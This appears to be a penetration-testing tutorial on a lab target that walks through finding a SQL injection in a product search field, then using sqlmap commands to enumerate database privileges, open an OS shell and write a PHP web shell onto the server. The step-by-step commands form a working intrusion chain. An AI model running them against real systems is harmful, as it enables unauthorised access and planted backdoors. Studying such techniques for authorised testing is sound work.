In this tutorial, we are going to learn how to upload a web shell using SQLmap. SQLmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
Find SQL injection point
In this scenario, I used a vulnerable web application that allows users to search products by entering a product name in the search field. let’s check if this web application is vulnerable to SQL injection.
Here, I’m going to use the Burp tool to capture the web application request. this application has a search function that will query the database when given the product name “productName=”, and it returns product information from the database. if I put productName=’ into the parameter it will return some SQL error message from the webserver. we know this is the most straightforward method to find SQL vulnerability in web applications.
Recon with SQLmap
Now suppose that we found a SQL injection vulnerability from our web application, we can move into the SQLmap. first, we need to identify what are the information that we can help with our attack. example collecting the user name of the current database, the permission of the current database user, the absolute path of the website and other information.
The SQLmap command to view the current database user is as follows:
sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --current-user
The above image shows the user of the current database is “manager@localhost“. then we can run the following command to check the database user permissions.
sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --privileges
We can observe from the above image that the current database user has file permissions to manage system files.
Upload files with SQLmap
Step 1:
The SQLMap allows users to upload subsequent web backdoors. In this step, I used the –os-shell command to upload the web shell to the web server.
Enter the following command in the terminal, sqlmap will let us choose the settings:
sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --dbs --os-shell
As shown in the figure below, we have to choose script language selection [4] PHP and use it for a writable directory [4] Brute force search. if you know the absolute directory path you can select [2].
finally, we can see something interesting: a backdoor and file stager were successfully uploaded on http://10.10.10.169/tmpuzbio.php. So, all we have to do is go to the URL and it will give us PHP backdoor as a file uploader.
Step 2:
In this stage, we will upload our web shell using the file write a method. We can write a file by entering the following command:
Note: --file-writeis the absolute path stored by the physical machine webshell; --file-dest is the absolute path written to the target machine.
sqlmap -u "http://10.10.10.167/search_products.php" --data "productName=*" --dbms "mysql" --dbs --file-write=/home/ukmihiran/Desktop/w.php --file-dest=C:/inetpub/wwwroot/w.php --batch
From the prompt message of sqlmap below, we can see that we have successfully written to the web shell.
Now you can go to the given URL and it will give an interactive web shell. 😎